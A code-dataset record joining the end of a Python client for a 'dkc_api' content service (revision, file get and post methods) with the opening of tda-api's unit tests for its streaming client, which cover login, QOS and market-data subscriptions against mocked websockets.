last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
Union[GetRevisionDrawings, ResponceError]: Return revision last size.
Example:
>>> dkc_api.Content.GetRevisionDrawings()
> GetRevisionDrawings(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/drawings?{send_last_updated}", headers=self.headers)
try: return GetRevisionDrawings(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getRevisionCertificates(self, last_updated: datetime.datetime=None) -> Union[GetRevisionCertificates, ResponceError]:
""" An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
Union[GetRevisionCertificates, ResponceError]: Return revision last size.
Example:
>>> dkc_api.Content.GetRevisionCertificates()
> GetRevisionCertificates(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/certificates?{send_last_updated}", headers=self.headers)
try: return GetRevisionCertificates(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getRevisionMaterials(self, last_updated: datetime.datetime=None) -> Union[GetRevisionMaterials, ResponceError]:
""" An array containing the complete data upload or delta of changes, if the last_updated by drawings parameter is specified.
Args:
last_updated (datetime, optional): if specified, only processes changes from the specified date. Timestamp format.
Returns:
Union[GetRevisionMaterials, ResponceError]: Return revision last size.
Example:
>>> dkc_api.Content.GetRevisionMaterials()
> GetRevisionMaterials(revision={delta=false, countries={updated=[{...}], removed=[{...}]}, ...})
"""
send_last_updated = ""
if last_updated is not None and isinstance(last_updated, datetime.datetime):
send_last_updated = f"last_updated={int(last_updated.timestamp())}"
elif last_updated is not None and not isinstance(last_updated, datetime.datetime):
raise NotValidVariables(f"Variables last_updated not valid datetime class. Getting {type(last_updated)} class.")
if self.debug: self.logger.debug(f"send_last_updated -> {send_last_updated}")
responce = requests.get(f"{URL_DOMAIN}/revisions/materials?{send_last_updated}", headers=self.headers)
self.logger.debug(responce.json())
try: return GetRevisionMaterials(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def getFile(self, file_id: int) -> Union[GetFile, ResponceError]:
""" Method for getting files via API
Args:
file_id (int): id file.
Returns:
Union[GetFile, ResponceError]: Return file name and content.
Example:
>>> dkc_api.Content.getFile(id=1)
> getFile({name="Спецификация.txt", content="MUAyODExMjAxOUBAMzYwNTA1QDEwQNCo0KJADQoyQDI4MTEyM..."})
"""
if not isinstance(file_id, int):
raise NotValidVariables(f"Variables id not valid int class. Getting {type(file_id)} class.")
responce = requests.get(f"{URL_DOMAIN}/file?id={file_id}", headers=self.headers)
try: return GetFile(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() })
def postFile(self, file_content: PostFileContent) -> Union[PostFile, ResponceError]:
""" Method for getting files via API
Args:
file_content (PostFileContent): file content.
Returns:
Union[PostFile, ResponceError]: Return file name id.
Example:
>>> dkc_api.Content.PostFile(PostFileContent={name="file_with_key.txt", value="8-khkjgj7hgJHGJHG97jhHKJ"})
> PostFile({id=889})
"""
if not isinstance(file_content, PostFileContent):
raise NotValidVariables(f"Variables file_content not valid PostFileContent class. Getting {type(file_content)} class.")
responce = requests.post(f"{URL_DOMAIN}/file", data=file_content.dict(), headers=self.headers)
try: return PostFile(**responce.json())
except ValidationError:
if responce.status_code == 500 or responce.status_code == 403:
return ResponceErrorAlternative(**responce.json())
return ResponceError(**{"code": responce.status_code, **responce.json() }) | 49.659483 | 133 | 0.66522 |
aa264d637da4be6cdb018c2a4cc915b2e947af69 | 150,554 | py | Python | tests/streaming_test.py | r4m0n/tda-api | ceb2f15c0be0fd51e9c586cfe3604d97ba832e55 | [
"MIT"
] | null | null | null | tests/streaming_test.py | r4m0n/tda-api | ceb2f15c0be0fd51e9c586cfe3604d97ba832e55 | [
"MIT"
] | null | null | null | tests/streaming_test.py | r4m0n/tda-api | ceb2f15c0be0fd51e9c586cfe3604d97ba832e55 | [
"MIT"
] | null | null | null | import tda
import urllib.parse
import json
import copy
from .utils import (account_principals, has_diff, MockResponse,
no_duplicates, AsyncMagicMock)
import asynctest
from unittest.mock import ANY, call, MagicMock, Mock
from tda import streaming
import asyncio
StreamClient = streaming.StreamClient
ACCOUNT_ID = 1000
TOKEN_TIMESTAMP = '2020-05-22T02:12:48+0000'
class StreamClientTest(asynctest.TestCase):
def setUp(self):
self.http_client = MagicMock()
self.client = StreamClient(self.http_client)
self.maxDiff = None
def account(self, index):
account = account_principals()['accounts'][0]
account['accountId'] = str(ACCOUNT_ID + index)
def parsable_as_int(s):
try:
int(s)
return True
except ValueError:
return False
for key, value in list(account.items()):
if isinstance(value, str) and not parsable_as_int(value):
account[key] = value + '-' + str(account['accountId'])
return account
def stream_key(self, index):
return {'key': 'streamerSubscriptionKeys-keys-key' + str(index)}
def request_from_socket_mock(self, socket):
return json.loads(
socket.send.call_args_list[0][0][0])['requests'][0]
def success_response(self, request_id, service, command):
return {
'response': [
{
'service': service,
'requestid': str(request_id),
'command': command,
'timestamp': 1590116673258,
'content': {
'code': 0,
'msg': 'success'
}
}
]
}
def streaming_entry(self, service, command, content=None):
d = {
'data': [{
'service': service,
'command': command,
'timestamp': 1590186642440
}]
}
if content:
d['data'][0]['content'] = content
return d
def assert_handler_called_once_with(self, handler, expected):
handler.assert_called_once()
self.assertEqual(len(handler.call_args_list[0]), 2)
data = handler.call_args_list[0][0][0] # Mock from <- 3.7 has a bad api
self.assertFalse(has_diff(data, expected))
async def login_and_get_socket(self, ws_connect):
principals = account_principals()
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
socket.reset_mock()
return socket
##########################################################################
# Login
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_single_account_success(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
socket.send.assert_awaited_once()
request = self.request_from_socket_mock(socket)
creds = urllib.parse.parse_qs(request['parameters']['credential'])
self.assertEqual(creds['userid'], ['1001'])
self.assertEqual(creds['token'], ['streamerInfo-token'])
self.assertEqual(creds['company'], ['accounts-company-1001'])
self.assertEqual(
creds['cddomain'],
['accounts-accountCdDomainId-1001'])
self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup'])
self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel'])
self.assertEqual(creds['authorized'], ['Y'])
self.assertEqual(creds['timestamp'], ['1590113568000'])
self.assertEqual(creds['appid'], ['streamerInfo-appId'])
self.assertEqual(creds['acl'], ['streamerInfo-acl'])
self.assertEqual(request['parameters']['token'], 'streamerInfo-token')
self.assertEqual(request['parameters']['version'], '1.0')
self.assertEqual(request['requestid'], '0')
self.assertEqual(request['service'], 'ADMIN')
self.assertEqual(request['command'], 'LOGIN')
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_single_account_success_async(self, ws_connect):
'''
Same as test_login_single_account_success except the underlying client
is asynchronous and returns a coroutine for get_user_principals.
'''
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
async def get_user_principals(*args, **kwargs):
return MockResponse(principals, 200)
self.http_client.get_user_principals = get_user_principals
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
socket.send.assert_awaited_once()
request = self.request_from_socket_mock(socket)
creds = urllib.parse.parse_qs(request['parameters']['credential'])
self.assertEqual(creds['userid'], ['1001'])
self.assertEqual(creds['token'], ['streamerInfo-token'])
self.assertEqual(creds['company'], ['accounts-company-1001'])
self.assertEqual(
creds['cddomain'],
['accounts-accountCdDomainId-1001'])
self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup'])
self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel'])
self.assertEqual(creds['authorized'], ['Y'])
self.assertEqual(creds['timestamp'], ['1590113568000'])
self.assertEqual(creds['appid'], ['streamerInfo-appId'])
self.assertEqual(creds['acl'], ['streamerInfo-acl'])
self.assertEqual(request['parameters']['token'], 'streamerInfo-token')
self.assertEqual(request['parameters']['version'], '1.0')
self.assertEqual(request['requestid'], '0')
self.assertEqual(request['service'], 'ADMIN')
self.assertEqual(request['command'], 'LOGIN')
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_multiple_accounts_require_account_id(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['accounts'].append(self.account(2))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(2))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
with self.assertRaisesRegex(ValueError,
'.*initialized with unspecified account_id.*'):
await self.client.login()
ws_connect.assert_not_called()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_multiple_accounts_with_account_id(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['accounts'].append(self.account(2))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(2))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
self.client = StreamClient(self.http_client, account_id=1002)
await self.client.login()
socket.send.assert_awaited_once()
request = self.request_from_socket_mock(socket)
creds = urllib.parse.parse_qs(request['parameters']['credential'])
self.assertEqual(creds['userid'], ['1002'])
self.assertEqual(creds['token'], ['streamerInfo-token'])
self.assertEqual(creds['company'], ['accounts-company-1002'])
self.assertEqual(
creds['cddomain'],
['accounts-accountCdDomainId-1002'])
self.assertEqual(creds['usergroup'], ['streamerInfo-userGroup'])
self.assertEqual(creds['accesslevel'], ['streamerInfo-accessLevel'])
self.assertEqual(creds['authorized'], ['Y'])
self.assertEqual(creds['timestamp'], ['1590113568000'])
self.assertEqual(creds['appid'], ['streamerInfo-appId'])
self.assertEqual(creds['acl'], ['streamerInfo-acl'])
self.assertEqual(request['parameters']['token'], 'streamerInfo-token')
self.assertEqual(request['parameters']['version'], '1.0')
self.assertEqual(request['requestid'], '0')
self.assertEqual(request['service'], 'ADMIN')
self.assertEqual(request['command'], 'LOGIN')
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_unrecognized_account_id(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['accounts'].append(self.account(2))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(2))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
self.client = StreamClient(self.http_client, account_id=999999)
with self.assertRaisesRegex(ValueError,
'.*no account found with account_id 999999.*'):
await self.client.login()
ws_connect.assert_not_called()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_bad_response(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
response = self.success_response(0, 'ADMIN', 'LOGIN')
response['response'][0]['content']['code'] = 21
response['response'][0]['content']['msg'] = 'failed for some reason'
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.login()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_no_ssl_context(self, ws_connect):
self.client = StreamClient(self.http_client)
self.http_client.get_user_principals.return_value = MockResponse(
account_principals(), 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
ws_connect.assert_awaited_once_with(ANY)
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_ssl_context(self, ws_connect):
self.client = StreamClient(self.http_client, ssl_context='ssl_context')
self.http_client.get_user_principals.return_value = MockResponse(
account_principals(), 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
socket.recv.side_effect = [json.dumps(self.success_response(
0, 'ADMIN', 'LOGIN'))]
await self.client.login()
ws_connect.assert_awaited_once_with(ANY, ssl='ssl_context')
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_unexpected_request_id(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
response = self.success_response(0, 'ADMIN', 'LOGIN')
response['response'][0]['requestid'] = 9999
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaisesRegex(tda.streaming.UnexpectedResponse,
'unexpected requestid: 9999'):
await self.client.login()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_unexpected_service(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
response = self.success_response(0, 'NOT_ADMIN', 'LOGIN')
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaisesRegex(tda.streaming.UnexpectedResponse,
'unexpected service: NOT_ADMIN'):
await self.client.login()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_login_unexpected_command(self, ws_connect):
principals = account_principals()
principals['accounts'].clear()
principals['accounts'].append(self.account(1))
principals['streamerSubscriptionKeys']['keys'].clear()
principals['streamerSubscriptionKeys']['keys'].append(
self.stream_key(1))
self.http_client.get_user_principals.return_value = MockResponse(
principals, 200)
socket = AsyncMagicMock()
ws_connect.return_value = socket
response = self.success_response(0, 'ADMIN', 'NOT_LOGIN')
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaisesRegex(tda.streaming.UnexpectedResponse,
'unexpected command: NOT_LOGIN'):
await self.client.login()
##########################################################################
# QOS
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_qos_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'ADMIN', 'QOS'))]
await self.client.quality_of_service(StreamClient.QOSLevel.EXPRESS)
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'ADMIN',
'command': 'QOS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'qoslevel': '0'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_qos_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'ADMIN', 'QOS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.quality_of_service(StreamClient.QOSLevel.EXPRESS)
socket.recv.assert_awaited_once()
##########################################################################
# ACCT_ACTIVITY
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_account_activity_subs_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'ACCT_ACTIVITY', 'SUBS'))]
await self.client.account_activity_sub()
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'ACCT_ACTIVITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'streamerSubscriptionKeys-keys-key',
'fields': '0,1,2,3'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_account_activity_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'ACCT_ACTIVITY', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.account_activity_sub()
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_account_activity_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [
{
'service': 'ACCT_ACTIVITY',
'timestamp': 1591754497594,
'command': 'SUBS',
'content': [
{
'seq': 1,
'key': 'streamerSubscriptionKeys-keys-key',
'1': '1001',
'2': 'OrderEntryRequest',
'3': ''
}
]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'ACCT_ACTIVITY', 'SUBS')),
json.dumps(stream_item)]
await self.client.account_activity_sub()
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_account_activity_handler(handler)
self.client.add_account_activity_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'ACCT_ACTIVITY',
'timestamp': 1591754497594,
'command': 'SUBS',
'content': [
{
'seq': 1,
'key': 'streamerSubscriptionKeys-keys-key',
'ACCOUNT': '1001',
'MESSAGE_TYPE': 'OrderEntryRequest',
'MESSAGE_DATA': ''
}
]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# CHART_EQUITY
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_equity_subs_and_add_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'CHART_EQUITY', 'SUBS'))]
await self.client.chart_equity_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'CHART_EQUITY',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,2,3,4,5,6,7,8'
}
})
socket.reset_mock()
socket.recv.side_effect = [json.dumps(self.success_response(
2, 'CHART_EQUITY', 'ADD'))]
await self.client.chart_equity_add(['INTC'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'CHART_EQUITY',
'command': 'ADD',
'requestid': '2',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'INTC',
'fields': '0,1,2,3,4,5,6,7,8'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_equity_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'CHART_EQUITY', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_equity_subs(['GOOG', 'MSFT'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_equity_add_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response_subs = self.success_response(1, 'CHART_EQUITY', 'SUBS')
response_add = self.success_response(2, 'CHART_EQUITY', 'ADD')
response_add['response'][0]['content']['code'] = 21
socket.recv.side_effect = [
json.dumps(response_subs),
json.dumps(response_add)]
await self.client.chart_equity_subs(['GOOG', 'MSFT'])
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_equity_add(['INTC'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_equity_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [
{
'service': 'CHART_EQUITY',
'timestamp': 1590597641293,
'command': 'SUBS',
'content': [
{
'seq': 985,
'key': 'MSFT',
'1': 179.445,
'2': 179.57,
'3': 179.4299,
'4': 179.52,
'5': 53742.0,
'6': 339,
'7': 1590597540000,
'8': 18409
},
{
'seq': 654,
'key': 'GOOG',
'1': 1408.8,
'2': 1408.8,
'3': 1408.1479,
'4': 1408.1479,
'5': 500.0,
'6': 339,
'7': 1590597540000,
'8': 18409
}
]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')),
json.dumps(stream_item)]
await self.client.chart_equity_subs(['GOOG', 'MSFT'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_equity_handler(handler)
self.client.add_chart_equity_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'CHART_EQUITY',
'timestamp': 1590597641293,
'command': 'SUBS',
'content': [
{
'seq': 985,
'key': 'MSFT',
'OPEN_PRICE': 179.445,
'HIGH_PRICE': 179.57,
'LOW_PRICE': 179.4299,
'CLOSE_PRICE': 179.52,
'VOLUME': 53742.0,
'SEQUENCE': 339,
'CHART_TIME': 1590597540000,
'CHART_DAY': 18409
},
{
'seq': 654,
'key': 'GOOG',
'OPEN_PRICE': 1408.8,
'HIGH_PRICE': 1408.8,
'LOW_PRICE': 1408.1479,
'CLOSE_PRICE': 1408.1479,
'VOLUME': 500.0,
'SEQUENCE': 339,
'CHART_TIME': 1590597540000,
'CHART_DAY': 18409
}
]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# CHART_FUTURES
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_futures_subs_and_add_success(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'CHART_FUTURES', 'SUBS'))]
await self.client.chart_futures_subs(['/ES', '/CL'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'CHART_FUTURES',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ES,/CL',
'fields': '0,1,2,3,4,5,6'
}
})
socket.reset_mock()
socket.recv.side_effect = [json.dumps(self.success_response(
2, 'CHART_FUTURES', 'ADD'))]
await self.client.chart_futures_add(['/ZC'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'CHART_FUTURES',
'command': 'ADD',
'requestid': '2',
'source': 'streamerInfo-appId',
'parameters': {
'keys': '/ZC',
'fields': '0,1,2,3,4,5,6'
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_futures_subs_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response = self.success_response(1, 'CHART_FUTURES', 'SUBS')
response['response'][0]['content']['code'] = 21
socket.recv.side_effect = [json.dumps(response)]
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_futures_subs(['/ES', '/CL'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_futures_add_failure(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
response_subs = self.success_response(1, 'CHART_FUTURES', 'SUBS')
response_add = self.success_response(2, 'CHART_FUTURES', 'ADD')
response_add['response'][0]['content']['code'] = 21
socket.recv.side_effect = [
json.dumps(response_subs),
json.dumps(response_add)]
await self.client.chart_futures_subs(['/ES', '/CL'])
with self.assertRaises(tda.streaming.UnexpectedResponseCode):
await self.client.chart_futures_add(['/ZC'])
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_chart_futures_handler(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
stream_item = {
'data': [
{
'service': 'CHART_FUTURES',
'timestamp': 1590597913941,
'command': 'SUBS',
'content': [
{
'seq': 0,
'key': '/ES',
'1': 1590597840000,
'2': 2996.25,
'3': 2997.25,
'4': 2995.25,
'5': 2997.25,
'6': 1501.0
},
{
'seq': 0,
'key': '/CL',
'1': 1590597840000,
'2': 33.34,
'3': 33.35,
'4': 33.32,
'5': 33.35,
'6': 186.0
}
]
}
]
}
socket.recv.side_effect = [
json.dumps(self.success_response(1, 'CHART_FUTURES', 'SUBS')),
json.dumps(stream_item)]
await self.client.chart_futures_subs(['/ES', '/CL'])
handler = Mock()
async_handler = asynctest.CoroutineMock()
self.client.add_chart_futures_handler(handler)
self.client.add_chart_futures_handler(async_handler)
await self.client.handle_message()
expected_item = {
'service': 'CHART_FUTURES',
'timestamp': 1590597913941,
'command': 'SUBS',
'content': [{
'seq': 0,
'key': '/ES',
'CHART_TIME': 1590597840000,
'OPEN_PRICE': 2996.25,
'HIGH_PRICE': 2997.25,
'LOW_PRICE': 2995.25,
'CLOSE_PRICE': 2997.25,
'VOLUME': 1501.0
}, {
'seq': 0,
'key': '/CL',
'CHART_TIME': 1590597840000,
'OPEN_PRICE': 33.34,
'HIGH_PRICE': 33.35,
'LOW_PRICE': 33.32,
'CLOSE_PRICE': 33.35,
'VOLUME': 186.0
}]
}
self.assert_handler_called_once_with(handler, expected_item)
self.assert_handler_called_once_with(async_handler, expected_item)
##########################################################################
# QUOTE
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_equity_subs_success_all_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'QUOTE', 'SUBS'))]
await self.client.level_one_equity_subs(['GOOG', 'MSFT'])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'QUOTE',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': ('0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,' +
'20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,' +
'36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,' +
'52')
}
})
@no_duplicates
@asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock)
async def test_level_one_equity_subs_success_some_fields(self, ws_connect):
socket = await self.login_and_get_socket(ws_connect)
socket.recv.side_effect = [json.dumps(self.success_response(
1, 'QUOTE', 'SUBS'))]
await self.client.level_one_equity_subs(['GOOG', 'MSFT'], fields=[
StreamClient.LevelOneEquityFields.SYMBOL,
StreamClient.LevelOneEquityFields.BID_PRICE,
StreamClient.LevelOneEquityFields.ASK_PRICE,
StreamClient.LevelOneEquityFields.QUOTE_TIME,
])
socket.recv.assert_awaited_once()
request = self.request_from_socket_mock(socket)
self.assertEqual(request, {
'account': '1001',
'service': 'QUOTE',
'command': 'SUBS',
'requestid': '1',
'source': 'streamerInfo-appId',
'parameters': {
'keys': 'GOOG,MSFT',
'fields': '0,1,2,11'
}
})
@no_duplicates
